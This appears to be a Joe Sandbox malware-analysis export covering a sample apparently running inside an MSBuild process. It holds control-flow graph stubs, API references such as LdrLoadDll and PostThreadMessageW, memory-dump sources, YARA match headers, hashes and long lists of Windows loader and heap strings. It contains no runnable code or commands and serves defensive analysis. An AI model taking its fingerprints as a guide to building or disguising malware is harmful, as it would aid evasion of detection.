                                                                                                              • Opcode ID: acf6c40fb78e07b1d2841ef5552d34e5e95fe5b18e49d67504bdff009d2bb76e
                                                                                                              • Instruction ID: 47bcbf16f948bd2efa43fc2af02dc92d76913aba3bbe8767e293d2df0de71043
                                                                                                              • Opcode Fuzzy Hash: acf6c40fb78e07b1d2841ef5552d34e5e95fe5b18e49d67504bdff009d2bb76e
                                                                                                              • Instruction Fuzzy Hash: 7B11C272D4416C7EEB10AAE59C82DEF7B7CDF81398F44806AFA14A7240D56D4E06CBA4

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216
                                                                                                              • Opcode ID: 08fca1a0e1a0890d9208d996c0b528439d3dea7f914bf1ea09c325234879e7a1
                                                                                                              • Instruction ID: a796e303c3bda95c4014b7b5ddda5c90956674b21223f1a9010352b1be183124
                                                                                                              • Opcode Fuzzy Hash: 08fca1a0e1a0890d9208d996c0b528439d3dea7f914bf1ea09c325234879e7a1
                                                                                                              • Instruction Fuzzy Hash: 9301C4B2D0011C7ADB10AAE59C82DEF7B7CEF41398F45806AFA04A7241D6684E068BA5

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 77 42cbd3-42cc17 call 404883 call 42dac3 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CC12
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID: neA
                                                                                                              • API String ID: 3298025750-2757349852
                                                                                                              • Opcode ID: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                                                                              • Instruction ID: 9b298db65f8c6bf01d9dcfbfa9e7aa2d063570d1b727d24a4cf7208db5536a0f
                                                                                                              • Opcode Fuzzy Hash: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                                                                              • Instruction Fuzzy Hash: 74E06D722042147BC614EE99DC41EAB73ACEFC8714F408419FD08A7241DA70B9108BB8

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 100 4178b3-4178bc 101 417912 100->101 102 4178be-4178d1 100->102 105 417915-41791f 101->105 106 4178a9 101->106 103 4178d3-4178d9 102->103 104 417878-417891 call 42fdc3 call 42dfc3 102->104 107 417920-417922 103->107 108 4178db 103->108 110 4178aa-4178ad 104->110 124 417893-4178a7 LdrLoadDll 104->124 105->107 106->110 111 417994-41799e 107->111 112 417924-417991 107->112 108->108 114 4179a0-4179a3 111->114 115 4179a4-4179bb call 42f583 111->115 122 4179bd-4179ee call 42f583 call 42b7d3 115->122 123 4179ef-417a0f call 42b7d3 115->123 124->110
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 147 417826-41782b 148 417839-41785c call 42f523 147->148 149 41782e 147->149 154 417862-417870 call 42fb23 148->154 155 41785e-417861 148->155 149->148 150 417895-4178a7 LdrLoadDll 149->150 152 4178aa-4178ad 150->152 158 417880-417891 call 42dfc3 154->158 159 417872-41787d call 42fdc3 154->159 158->152 165 417893-4178a7 LdrLoadDll 158->165 159->158 165->152
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 166 42cb83-42cbc7 call 404883 call 42dac3 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041E63E,?,?,00000000,?,0041E63E,?,?,?), ref: 0042CBC2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 176 42cc23-42cc5f call 404883 call 42dac3 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,41319B85,?,?,41319B85), ref: 0042CC5A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 181 1152c0a-1152c0f 182 1152c11-1152c18 181->182 183 1152c1f-1152c26 LdrInitializeThunk 181->183
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2160512332
                                                                                                              Strings
                                                                                                              • Address of the debug info found in the active list., xrefs: 011854AE, 011854FA
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01185543
                                                                                                              • Thread identifier, xrefs: 0118553A
                                                                                                              • Critical section address, xrefs: 01185425, 011854BC, 01185534
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011854E2
                                                                                                              • 8, xrefs: 011852E3
                                                                                                              • Invalid debug info address of this critical section, xrefs: 011854B6
                                                                                                              • double initialized or corrupted critical section, xrefs: 01185508
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011854CE
                                                                                                              • corrupted critical section, xrefs: 011854C2
                                                                                                              • Critical section address., xrefs: 01185502
                                                                                                              • Critical section debug info address, xrefs: 0118541F, 0118552E
                                                                                                              • undeleted critical section in freed memory, xrefs: 0118542B
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0118540A, 01185496, 01185519
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                              • API String ID: 0-2368682639
                                                                                                              Strings
                                                                                                              • @, xrefs: 0118259B
                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011822E4
                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0118261F
                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01182409
                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011825EB
                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01182498
                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011824C0
                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01182506
                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01182602
                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01182412
                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01182624
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                              • API String ID: 0-4009184096
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                              • API String ID: 0-2515994595
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              • API String ID: 0-1700792311
                                                                                                              Strings
                                                                                                              • VerifierFlags, xrefs: 01198C50
                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01198A3D
                                                                                                              • HandleTraces, xrefs: 01198C8F
                                                                                                              • VerifierDebug, xrefs: 01198CA5
                                                                                                              • VerifierDlls, xrefs: 01198CBD
                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01198B8F
                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01198A67
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Strings
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              Strings
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              Strings
                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01169A01
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01169A11, 01169A3A
                                                                                                              • apphelp.dll, xrefs: 01106496
                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011699ED
                                                                                                              • LdrpInitShimEngine, xrefs: 011699F4, 01169A07, 01169A30
                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01169A2A
                                                                                                              Strings
                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0118219F
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01182165
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01182178
                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01182160, 0118219A, 011821BA
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01182180
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011821BF
                                                                                                              Strings
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01188170
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01188181, 011881F5
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0114C6C3
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01188177, 011881EB
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 011881E5
                                                                                                              • LdrpInitializeProcess, xrefs: 0114C6C4
                                                                                                              APIs
                                                                                                                • Part of subcall function 01152DF0: LdrInitializeThunk.NTDLL ref: 01152DFA
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01150BA3
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01150BB6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01150D60
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01150D74
                                                                                                              Strings
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              Strings
                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0114855E
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01148421
                                                                                                              • @, xrefs: 01148591
                                                                                                              • LdrpInitializeProcess, xrefs: 01148422
                                                                                                              Strings
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011822B6
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 011821DE
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011821D9, 011822B1
                                                                                                              • .Local, xrefs: 011428D8
                                                                                                              Strings
                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011710AE
                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0117106B
                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01170FE5
                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01171028
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0117A9A2
                                                                                                              • apphelp.dll, xrefs: 01132462
                                                                                                              • LdrpDynamicShimModule, xrefs: 0117A998
                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0117A992
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-176724104
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 01123255
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0112327D
                                                                                                              • HEAP: , xrefs: 01123264
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 0-1077428164
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              Strings
                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0117A10F
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0117A121
                                                                                                              • LdrpCheckModule, xrefs: 0117A117
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-161242083
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-1334570610
                                                                                                              Strings
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 011882D7
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 011882DE
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011882E8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1783798831
                                                                                                              Strings
                                                                                                              • PreferredUILanguages, xrefs: 011CC212
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011CC1C5
                                                                                                              • @, xrefs: 011CC1F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                              • API String ID: 0-1373925480
                                                                                                              Strings
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01194888
                                                                                                              • LdrpCheckRedirection, xrefs: 0119488F
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01194899
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-3154609507
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-2558761708
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01192104
                                                                                                              • LdrpInitializationFailure, xrefs: 011920FA
                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 011920F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2986994758
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: #%u
                                                                                                              • API String ID: 48624451-232158463
                                                                                                              Strings
                                                                                                              • LdrResSearchResource Exit, xrefs: 0111AA25
                                                                                                              • LdrResSearchResource Enter, xrefs: 0111AA13
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                              • API String ID: 0-4066393604
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `$`
                                                                                                              • API String ID: 0-197956300
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Legacy$UEFI
                                                                                                              • API String ID: 2994545307-634100481
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$MUI
                                                                                                              • API String ID: 0-17815947
                                                                                                              Strings
                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0111063D
                                                                                                              • kLsE, xrefs: 01110540
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                              • API String ID: 0-2547482624
                                                                                                              Strings
                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0111A2FB
                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0111A309
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                              • API String ID: 0-2876891731
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MUI
                                                                                                              • API String ID: 0-1339004836
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalTags
                                                                                                              • API String ID: 0-1106856819
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .mui
